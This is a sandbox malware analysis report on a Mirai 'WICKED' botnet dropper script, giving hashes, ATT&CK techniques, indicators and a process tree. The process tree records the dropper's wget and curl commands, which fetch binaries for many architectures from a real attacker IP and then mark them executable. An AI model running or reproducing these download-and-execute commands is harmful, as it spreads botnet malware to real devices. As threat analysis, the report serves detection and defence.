mirai | 2e22b8d097eed40f8fd2c985b0a6fb31ed2f6ed8a022cc707ebbf9fc7be549cf

Analysis

max time kernel
149s
max time network
145s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
23/03/2025, 02:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

phantom.sh
Size

1KB
MD5

b25643d9ed071bba8af0ef060b5180bf
SHA1

12c13e5c16cabcd24f9c38b750acd5be92df73ec
SHA256

2e22b8d097eed40f8fd2c985b0a6fb31ed2f6ed8a022cc707ebbf9fc7be549cf
SHA512

5eac9707aa2c220394b2d2be4737451e8b1cba8fe86611656c3ac599ffc6c1b24f4a30e4a40122f57bda4a0ad7d5dc5862cdf779e7f481c7f396bd757fe016c9

Score

10^/10

mirai wicked botnet credential_access defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Extracted

Family

mirai

Botnet

WICKED

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 11 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1550	chmod
1568	chmod
1576	chmod
1584	chmod
1592	chmod
1616	chmod
1526	chmod
1534	chmod
1558	chmod
1600	chmod
1608	chmod

Executes dropped EXE 11 IoCs

ioc	pid	Process
/tmp/dbot	1527	phantom.sh
/tmp/dbot	1535	phantom.sh
/tmp/dbot	1551	phantom.sh
/tmp/dbot	1559	phantom.sh
/tmp/dbot	1569	phantom.sh
/tmp/dbot	1577	phantom.sh
/tmp/dbot	1585	phantom.sh
/tmp/dbot	1593	phantom.sh
/tmp/dbot	1601	phantom.sh
/tmp/dbot	1609	phantom.sh
/tmp/dbot	1617	phantom.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	phantom.sh
File opened for modification	/dev/misc/watchdog	phantom.sh

Enumerates active TCP sockets 1 TTPs 1 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	phantom.sh

Enumerates running processes
Discovers information about currently running processes on the system

Reads process memory 1 TTPs 38 IoCs

Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.

credential_access

Proc Filesystem

T1003.007

description	ioc	Process
File opened for reading	/proc/671/maps	phantom.sh
File opened for reading	/proc/674/maps	phantom.sh
File opened for reading	/proc/690/maps	phantom.sh
File opened for reading	/proc/981/maps	phantom.sh
File opened for reading	/proc/453/maps	phantom.sh
File opened for reading	/proc/611/maps	phantom.sh
File opened for reading	/proc/656/maps	phantom.sh
File opened for reading	/proc/679/maps	phantom.sh
File opened for reading	/proc/460/maps	phantom.sh
File opened for reading	/proc/498/maps	phantom.sh
File opened for reading	/proc/733/maps	phantom.sh
File opened for reading	/proc/927/maps	phantom.sh
File opened for reading	/proc/478/maps	phantom.sh
File opened for reading	/proc/530/maps	phantom.sh
File opened for reading	/proc/706/maps	phantom.sh
File opened for reading	/proc/504/maps	phantom.sh
File opened for reading	/proc/531/maps	phantom.sh
File opened for reading	/proc/413/maps	phantom.sh
File opened for reading	/proc/488/maps	phantom.sh
File opened for reading	/proc/564/maps	phantom.sh
File opened for reading	/proc/724/maps	phantom.sh
File opened for reading	/proc/969/maps	phantom.sh
File opened for reading	/proc/684/maps	phantom.sh
File opened for reading	/proc/414/maps	phantom.sh
File opened for reading	/proc/480/maps	phantom.sh
File opened for reading	/proc/484/maps	phantom.sh
File opened for reading	/proc/499/maps	phantom.sh
File opened for reading	/proc/503/maps	phantom.sh
File opened for reading	/proc/547/maps	phantom.sh
File opened for reading	/proc/965/maps	phantom.sh
File opened for reading	/proc/462/maps	phantom.sh
File opened for reading	/proc/466/maps	phantom.sh
File opened for reading	/proc/493/maps	phantom.sh
File opened for reading	/proc/539/maps	phantom.sh
File opened for reading	/proc/583/maps	phantom.sh
File opened for reading	/proc/610/maps	phantom.sh
File opened for reading	/proc/974/maps	phantom.sh
File opened for reading	/proc/978/maps	phantom.sh

Changes its process name 11 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1527	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1535	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1551	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1559	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1569	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1577	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1585	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1593	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1601	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1609	phantom.sh
Changes the process name, possibly in an attempt to hide itself	1617	phantom.sh

Reads system network configuration 1 TTPs 1 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	phantom.sh

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/413/fd	phantom.sh
File opened for reading	/proc/462/fd	phantom.sh
File opened for reading	/proc/1031/fd	phantom.sh
File opened for reading	/proc/1555/fd	phantom.sh
File opened for reading	/proc/1026/maps	phantom.sh
File opened for reading	/proc/1031/maps	phantom.sh
File opened for reading	/proc/1131/maps	phantom.sh
File opened for reading	/proc/1139/maps	phantom.sh
File opened for reading	/proc/1513/fd	phantom.sh
File opened for reading	/proc/981/fd	phantom.sh
File opened for reading	/proc/493/fd	phantom.sh
File opened for reading	/proc/684/fd	phantom.sh
File opened for reading	/proc/706/fd	phantom.sh
File opened for reading	/proc/965/fd	phantom.sh
File opened for reading	/proc/974/fd	phantom.sh
File opened for reading	/proc/1045/maps	phantom.sh
File opened for reading	/proc/488/fd	phantom.sh
File opened for reading	/proc/1147/maps	phantom.sh
File opened for reading	/proc/503/fd	phantom.sh
File opened for reading	/proc/1264/fd	phantom.sh
File opened for reading	/proc/1300/fd	phantom.sh
File opened for reading	/proc/1074/fd	phantom.sh
File opened for reading	/proc/1488/fd	phantom.sh
File opened for reading	/proc/547/fd	phantom.sh
File opened for reading	/proc/611/fd	phantom.sh
File opened for reading	/proc/690/fd	phantom.sh
File opened for reading	/proc/927/fd	phantom.sh
File opened for reading	/proc/1544/fd	phantom.sh
File opened for reading	/proc/1111/maps	phantom.sh
File opened for reading	/proc/969/fd	phantom.sh
File opened for reading	/proc/1111/fd	phantom.sh
File opened for reading	/proc/1074/maps	phantom.sh
File opened for reading	/proc/1084/maps	phantom.sh
File opened for reading	/proc/1167/maps	phantom.sh
File opened for reading	/proc/610/fd	phantom.sh
File opened for reading	/proc/978/fd	phantom.sh
File opened for reading	/proc/1183/fd	phantom.sh
File opened for reading	/proc/1310/fd	phantom.sh
File opened for reading	/proc/1562/fd	phantom.sh
File opened for reading	/proc/1586/fd	phantom.sh
File opened for reading	/proc/1088/maps	phantom.sh
File opened for reading	/proc/1098/maps	phantom.sh
File opened for reading	/proc/1202/fd	phantom.sh
File opened for reading	/proc/1528/fd	phantom.sh
File opened for reading	/proc/1597/fd	phantom.sh
File opened for reading	/proc/1051/fd	phantom.sh
File opened for reading	/proc/504/fd	phantom.sh
File opened for reading	/proc/1212/fd	phantom.sh
File opened for reading	/proc/1347/fd	phantom.sh
File opened for reading	/proc/1051/maps	phantom.sh
File opened for reading	/proc/1565/fd	phantom.sh
File opened for reading	/proc/539/fd	phantom.sh
File opened for reading	/proc/1088/fd	phantom.sh
File opened for reading	/proc/1143/fd	phantom.sh
File opened for reading	/proc/1170/fd	phantom.sh
File opened for reading	/proc/460/fd	phantom.sh
File opened for reading	/proc/480/fd	phantom.sh
File opened for reading	/proc/498/fd	phantom.sh
File opened for reading	/proc/674/fd	phantom.sh
File opened for reading	/proc/1182/fd	phantom.sh
File opened for reading	/proc/1184/fd	phantom.sh
File opened for reading	/proc/1594/fd	phantom.sh
File opened for reading	/proc/1078/fd	phantom.sh
File opened for reading	/proc/1139/fd	phantom.sh

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1532	curl
1529	wget

Writes file to tmp directory 23 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/mips	curl
File opened for modification	/tmp/arm	wget
File opened for modification	/tmp/arm6	curl
File opened for modification	/tmp/spc	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/x86	curl
File opened for modification	/tmp/mpsl	curl
File opened for modification	/tmp/arm	curl
File opened for modification	/tmp/arm6	wget
File opened for modification	/tmp/arm7	wget
File opened for modification	/tmp/arm7	curl
File opened for modification	/tmp/spc	curl
File opened for modification	/tmp/dbot	phantom.sh
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/sh4	curl
File opened for modification	/tmp/ppc	curl
File opened for modification	/tmp/mpsl	wget
File opened for modification	/tmp/arm5	wget
File opened for modification	/tmp/arm5	curl
File opened for modification	/tmp/m68k	curl

/tmp/phantom.sh
/tmp/phantom.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- Writes file to tmp directory
PID:1519
- /usr/bin/wget
  wget http://157.245.211.199/bins/x86
  2⤵
  - Writes file to tmp directory
  PID:1520
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/x86
  2⤵
  - Writes file to tmp directory
  PID:1524
- /bin/cat
  cat x86
  2⤵
  PID:1525
- /bin/chmod
  chmod +x config-err-kM39Xd dbot netplan_6s4sb40f phantom.sh snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-9kbzMd x86
  2⤵
  - File and Directory Permissions Modification
  PID:1526
- /usr/bin/wget
  wget http://157.245.211.199/bins/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1529
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1532
- /bin/chmod
  chmod +x config-err-kM39Xd dbot mips netplan_6s4sb40f phantom.sh snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-GAP7dZ systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-9kbzMd x86
  2⤵
  - File and Directory Permissions Modification
  PID:1534
- /usr/bin/wget
  wget http://157.245.211.199/bins/mpsl
  2⤵
  - Writes file to tmp directory
  PID:1545
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/mpsl
  2⤵
  - Writes file to tmp directory
  PID:1548
- /bin/chmod
  chmod +x config-err-kM39Xd dbot mips mpsl netplan_6s4sb40f phantom.sh snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-9kbzMd x86
  2⤵
  - File and Directory Permissions Modification
  PID:1550
- /usr/bin/wget
  wget http://157.245.211.199/bins/arm
  2⤵
  - Writes file to tmp directory
  PID:1553
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/arm
  2⤵
  - Writes file to tmp directory
  PID:1556
- /bin/chmod
  chmod +x arm config-err-kM39Xd dbot mips mpsl netplan_6s4sb40f phantom.sh snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-timedated.service-9kbzMd x86
  2⤵
  - File and Directory Permissions Modification
  PID:1558
- /usr/bin/wget
  wget http://157.245.211.199/bins/arm5
  2⤵
  - Writes file to tmp directory
  PID:1563
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/arm5
  2⤵
  - Writes file to tmp directory
  PID:1566
- /bin/chmod
  chmod +x arm arm5 config-err-kM39Xd dbot mips mpsl netplan_6s4sb40f phantom.sh snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc x86
  2⤵
  - File and Directory Permissions Modification
  PID:1568
- /usr/bin/wget
  wget http://157.245.211.199/bins/arm6
  2⤵
  - Writes file to tmp directory
  PID:1571
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/arm6
  2⤵
  - Writes file to tmp directory
  PID:1574
- /bin/chmod
  chmod +x arm arm5 arm6 config-err-kM39Xd dbot mips mpsl netplan_6s4sb40f phantom.sh snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc x86
  2⤵
  - File and Directory Permissions Modification
  PID:1576
- /usr/bin/wget
  wget http://157.245.211.199/bins/arm7
  2⤵
  - Writes file to tmp directory
  PID:1579
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/arm7
  2⤵
  - Writes file to tmp directory
  PID:1582
- /bin/chmod
  chmod +x arm arm5 arm6 arm7 config-err-kM39Xd dbot mips mpsl netplan_6s4sb40f phantom.sh snap-private-tmp ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc x86
  2⤵
  - File and Directory Permissions Modification
  PID:1584
- /usr/bin/wget
  wget http://157.245.211.199/bins/spc
  2⤵
  - Writes file to tmp directory
  PID:1587
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/spc
  2⤵
  - Writes file to tmp directory
  PID:1590
- /bin/chmod
  chmod +x arm arm5 arm6 arm7 config-err-kM39Xd dbot mips mpsl netplan_6s4sb40f phantom.sh snap-private-tmp spc ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc x86
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /usr/bin/wget
  wget http://157.245.211.199/bins/m68k
  2⤵
  - Writes file to tmp directory
  PID:1595
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/m68k
  2⤵
  - Writes file to tmp directory
  PID:1598
- /bin/chmod
  chmod +x arm arm5 arm6 arm7 config-err-kM39Xd dbot m68k mips mpsl netplan_6s4sb40f phantom.sh snap-private-tmp spc ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc x86
  2⤵
  - File and Directory Permissions Modification
  PID:1600
- /usr/bin/wget
  wget http://157.245.211.199/bins/sh4
  2⤵
  - Writes file to tmp directory
  PID:1603
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/sh4
  2⤵
  - Writes file to tmp directory
  PID:1606
- /bin/chmod
  chmod +x arm arm5 arm6 arm7 config-err-kM39Xd dbot m68k mips mpsl netplan_6s4sb40f phantom.sh sh4 snap-private-tmp spc ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc x86
  2⤵
  - File and Directory Permissions Modification
  PID:1608
- /usr/bin/wget
  wget http://157.245.211.199/bins/ppc
  2⤵
  - Writes file to tmp directory
  PID:1611
- /usr/bin/curl
  curl -O http://157.245.211.199/bins/ppc
  2⤵
  - Writes file to tmp directory
  PID:1614
- /bin/chmod
  chmod +x arm arm5 arm6 arm7 config-err-kM39Xd dbot m68k mips mpsl netplan_6s4sb40f phantom.sh ppc sh4 snap-private-tmp spc ssh-66oixxus1FZ6 systemd-private-a87e9c3960e742b48afea8b8dc7717e6-bolt.service-qwgTpB systemd-private-a87e9c3960e742b48afea8b8dc7717e6-colord.service-uaLdXH systemd-private-a87e9c3960e742b48afea8b8dc7717e6-ModemManager.service-I34Dqh systemd-private-a87e9c3960e742b48afea8b8dc7717e6-systemd-resolved.service-I1OBZc x86
  2⤵
  - File and Directory Permissions Modification
  PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

OS Credential Dumping

T1003

Proc Filesystem

T1003.007

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/arm

Filesize
65KB

MD5
c41a79699de953380428ae97410bb85f

SHA1
747a2e1757455604ec6ab089eeec07744b71d79c

SHA256
753c2a1eaa8b0212cd1f451ff250d96f46c0d035c02b6909aaf02018b7835ecf

SHA512
c0f23806b1d470d24c77cd76e93e4981bf806a8c74cc38322448566976bc0412176847210a1c6bfa1448bff9ef5ba91ffd35bd1857ae80a5bb0448f386c7753c

Download Submit
/tmp/arm5

Filesize
41KB

MD5
2b9ff651d116fd4220b9ef064edc87ed

SHA1
82a30aec3a92d6b9aa928c49c775bdc5c7f368a7

SHA256
a683e1c24a8f520953bd275cd7a49788e1fe492c2a1f810a85c5275f0063250e

SHA512
e5affabceca41f66b769c7d707e5040e7feaceab8fb45a2953f596c82641d30244030d7d2605a0765d6a29763502563be99a944fa7d993d483f35ec097fd92ea

Download Submit
/tmp/arm6

Filesize
73KB

MD5
9b4a9ffc8981f7af2b338260b47f8ae7

SHA1
5558be7ec4a318c25c659764ebacdc9ca066fdcd

SHA256
b76c2cbe3d2450fea49fd42f29c29bc18bced3ef0001f9ac10e057d3a590056d

SHA512
80b23756ebaddf8104482a45473f5dedc31ca14ec4eeffab70677a4762b0e4c77350a33c53eac4d5282138e73c1b5f1db2574732c7acae3f098e5e580c7e4b1a

Download Submit
/tmp/arm7

Filesize
140KB

MD5
a4f6cf4e6edb03734e3fd5d250dfa63b

SHA1
1297b2b89a27d8c3615548099cd38cbab48dc406

SHA256
5cc8e494a701a2f510cff13ec26bc59ef4c8f0812685a1ff7752a1c613f52f31

SHA512
5e1828b4cf29b04a553895af4299a46d83de01f59142737b1a66d121047404636d7c38b4052319fc6c5d5be100af82d7c9c54f4c41f5aa80bc3d423e70e8eb78

Download Submit
/tmp/m68k

Filesize
65KB

MD5
0a548e5e31b00bd078466d15eb16e546

SHA1
0203328ab86cda8492ca3ea86528c4272394e7e8

SHA256
3235403721303e205a16197923af1e265a884bbf847e85334f4c9e1872cc21a3

SHA512
fb5ceb1dd5786462a89d61e133b587fb5fdec8b638be3f7af288930bb74a600aaf0b8932f6765318a5a9948fd22e83e5ec4c392dd907e298159eddf6a3576cee

Download Submit
/tmp/mips

Filesize
82KB

MD5
7f3a7052000e43a7ea7b3831d3471c53

SHA1
ea0f5ad61681af067cd5c8a6c1fe9f8df20e7fb0

SHA256
740e42e867d99cdcdc6e3905156543ac4463f26a20a87cefa21907ffa926fd27

SHA512
a93e9477a07d66ea950b8cceba5b9953fb9266606cee61ec8d8dbe854f276b0a8df85ae5f80fb738cb0f3a8f7c322e2953757e392443fba6b85adcd14c602e28

Download Submit
/tmp/mpsl

Filesize
82KB

MD5
d10cde406bb6e741caa075ae3eb1b59b

SHA1
3b8761c325ff59e67ced6151d5c0b483e7009ff0

SHA256
33aaa80f492242f0a5e3e8edec511d11b09910e21d044b7425f2b19c79885275

SHA512
d475ae20989beac90cb6bd51b2a91536880af3c07c7a5e5de5210670ee0292e599871488659fbf99206aaf1e99e19b5344ef936a0a602abffdf62b4473edb48d

Download Submit
/tmp/ppc

Filesize
59KB

MD5
1f0a0cf47d7afd1a4a8bb7ff114e4d0b

SHA1
0a471bebec32732da450e7424abf7f7dbd6bc94c

SHA256
e060e305cce23869f5df383bde88659289d03d65697a048eb26e328f12fcc83b

SHA512
f1cf1bc0a046aeb78cb95ecba69f1dcbaf2cad950016b3a4e4c331a6a243429ed4fec50ab3e8c995ec17d66218440a516257b4afc2fb03a424ea729010c22e80

Download Submit
/tmp/sh4

Filesize
54KB

MD5
1aa4143ebcf26124be79600326fd0e38

SHA1
b166ad38f3ee4faf5876417db28aa3ab1c211cff

SHA256
21a3cd61d4c9043b38ac2d0afe218c89d7205855bfaa7f91a20f7872b9124e4b

SHA512
dbe5e2027add1007806e7d500517d538c4b669c36778ba88acf4c376c1ffa33e7bce8cd6c1a33d147b5490d8ab342a0f77a15a111603faa508d0b827c86ccdd5

Download Submit
/tmp/spc

Filesize
65KB

MD5
19d915863ed88ad6cfbed0a9e91875b4

SHA1
2a162911ba6df6689052c4f4f215e2a509e875e6

SHA256
83ea2fbf03f0177db78259a4eadda417ec881202c66bba84f3f0ee20ed098dba

SHA512
b75deb4f8c8f59c8a079b41648d390758a2aa05e763d91e6c834d2344df6050779dcfa7040271f63970cd657d258e4f7294ce1888f0dcdd8b6d77d246447f60a

Download Submit
/tmp/x86

Filesize
56KB

MD5
a7b4473399ce74c911ec86fe9f3a2295

SHA1
16ceb93a19944b099d8da7c0f42faa92954fd8e7

SHA256
5064463e3dcdc501a0cd479dcb09b24bd3bd0bf7cbacac0341f09c85f7dce81e

SHA512
32031eae5f5e33a5c5c3c2f97d69675e54ddc3b74f85016418d543ff2a806cf92f77ca5b5c1085e5691544ced62c1b05e4d56da01d62d0e07b5555d40d151125

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads